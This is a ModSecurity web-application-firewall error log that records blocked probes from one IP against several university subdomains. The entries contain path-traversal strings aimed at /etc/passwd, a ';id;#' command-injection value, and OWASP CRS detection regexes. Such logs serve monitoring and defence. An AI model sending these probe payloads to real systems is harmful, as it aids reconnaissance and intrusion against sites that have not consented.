[Tue Aug 29 11:46:15.449407 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhrqQIAAAAo"]
[Tue Aug 29 11:46:15.450711 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhzvioAAAAx"]
[Tue Aug 29 11:46:15.457583 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAipS6oAAAAF"]
[Tue Aug 29 11:46:15.459876 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAdxUr4AAAAC"]
[Tue Aug 29 11:46:15.588703 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhl0BYAAAAi"]
[Tue Aug 29 11:46:15.607264 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhrqQQAAAAo"]
[Tue Aug 29 11:46:16.371331 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14GMCo-f0AAAhzvi0AAAAx"]
[Tue Aug 29 11:46:18.372111 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi0JKkAAAAK"]
[Tue Aug 29 11:46:18.432370 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi-RAsAAAAH"]
[Tue Aug 29 11:46:18.434449 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAhgoNgAAAAb"]
[Tue Aug 29 11:46:18.460122 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAhgoNkAAAAb"]
[Tue Aug 29 11:46:18.462959 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi2yDIAAAAN"]
[Tue Aug 29 11:46:18.468167 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAdxUssAAAAC"]
[Tue Aug 29 11:46:18.469571 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAib52AAAAAA"]
[Tue Aug 29 11:46:18.479856 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAi-RA0AAAAH"]
[Tue Aug 29 11:46:18.498842 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAi-RA4AAAAH"]
[Tue Aug 29 11:46:18.508880 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAhl0B0AAAAi"]
[Tue Aug 29 11:46:19.395377 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAhBSGoAAAAX"]
[Tue Aug 29 11:46:19.457432 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cities"] [unique_id "ZO14G8Co-f0AAAhrqRMAAAAo"]
[Tue Aug 29 11:46:19.478654 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22package\\x22:\\x22 found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAhgoN8AAAAb"]
[Tue Aug 29 11:46:19.522458 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22package\\x22:\\x22 found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAib52cAAAAA"]
[Tue Aug 29 11:46:19.529381 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAdxUtMAAAAC"]
[Tue Aug 29 11:46:19.535737 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAhrqRcAAAAo"]
[Tue Aug 29 11:46:19.547486 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAhgoOIAAAAb"]
[Tue Aug 29 11:46:19.549678 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAib52gAAAAA"]
[Tue Aug 29 11:46:19.555537 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22package\\x22:\\x22 found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAi5uFQAAAAS"]
[Tue Aug 29 11:46:20.356814 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HMCo-f0AAAib52kAAAAA"]
[Tue Aug 29 11:46:20.389422 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAib52oAAAAA"]
[Tue Aug 29 11:46:20.453893 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22package\\x22:\\x22 found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14HMCo-f0AAAi2yDkAAAAN"]
[Tue Aug 29 11:46:20.513438 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhBSHQAAAAX"]
[Tue Aug 29 11:46:20.544773 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhl0CMAAAAi"]
[Tue Aug 29 11:46:20.545732 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAdxUtYAAAAC"]
[Tue Aug 29 11:46:20.558919 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HMCo-f0AAAhZRm0AAAAG"]
[Tue Aug 29 11:46:20.606600 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HMCo-f0AAAhl0CUAAAAi"]
[Tue Aug 29 11:46:20.624841 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAi2yD0AAAAN"]
